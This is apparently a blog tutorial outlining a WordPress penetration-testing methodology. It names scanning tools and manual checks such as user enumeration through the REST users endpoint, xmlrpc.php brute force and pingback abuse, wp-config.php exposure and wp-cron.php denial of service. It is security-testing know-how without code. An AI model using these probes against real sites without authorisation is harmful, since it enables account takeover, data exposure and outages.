Before moving forward with the approach to test a wordpress website, let’s discuss what is a wordpress. So, wordPress is a widely used, open-source content management system (CMS) that allows users to create and manage websites and blogs. It’s built on PHP and uses a MySQL database to store content and configuration settings.
A simple penetration testing methodology against wordpress website as follows:
Reconnaissance or ‘recon’: In this step gather information about the application and check different functionalities of the website using tools like Wappalyzer and WPintel..
Scanning: In this step scan for vulnerabilities and store the vulnerabilities you find in a document along with a severity level. It can be done using wordpress penetration testing tools like NMAP, FFuF, Nuclei, and Wpscan to uncover vulnerabilities.
Test cases: Prepare test cases to perform testing on the application and find the vulnerabilities according to the functionalities of the website.
Exploitation: This step can only be performed if it is the scope of testing and has permission to do it.
Recommendation and Reporting: Report and recommend the mitigations to the vulnerabilities found in order of the highest priority to the lowest.
Tool or Automated Approach:
Wappalyzer: This is a browser extension tool which gather information about the website.
WPintel: It efficiently scans self-hosted WordPress sites and unveils crucial information such as version details, vulnerabilities, plugins, themes, user insights, and more.
Nmap: It is used to scan wordpress websites to check for any open ports, operating systems, and potential vulnerabilities.
FFuF: It checks for any sensitive files by fuzzing or brute forcing the website and any hidden files such as info.php.
Wpscan: It is a powerful and widely used security tool specifically designed for assessing the security of WordPress websites. Its comprehensive set of features makes it an essential tool for both website owners and security professionals. It is used to perform tasks such as: vulnerability detection, theme and plugin scanning, user enumeration, password brute-force, database Enumeration, version detection, publicly known vulnerabilities, CVEs, CWEs and integration with other tools.
Manual Approach:
Check for user enumeration to list the users. By default, wordpress website uses: /wp-json/wp/v2/users endpoint to list the users.
Check for xmlrpc.php file.
Check for common vulnerabilities in xmlrpc.php file such as brute force attack, cross Site port attack – XSPA using pingback.ping method.
Prepare test cases and perform testing against it. Check for sql injection, xss, command injection, xxe and other type of injection vulnerabilities in the input parameters of the website.
Check for authentication and authorization issues such as weak password, login bypass, 2fa/mfa bypass, idor, captcha bypass, etc.
Check for session related vulnerabilities such as session hijacking, session invalidation, reuse of session tokens and session expiration issues and more.
Check for that main wordpress files and folders: index.php, license.txt contains useful information such as the version wordpress installed, wp-activate.php is used for the email activation process when setting up a new wordpress site.
Login folders include /wp-admin/login.php, /wp-admin/wp-login.php, /login.php or /wp-login.php, wp-content folder is the main directory where plugins and themes are stored.
wp-includes/ is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets and wp-sitemap.xml file.
Check for wp-config.php file which contains information required by wordpress to connect to the database such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can useful in troubleshooting.
Check /wp-cron.php file to cause a DoS attack.
Helpful resources: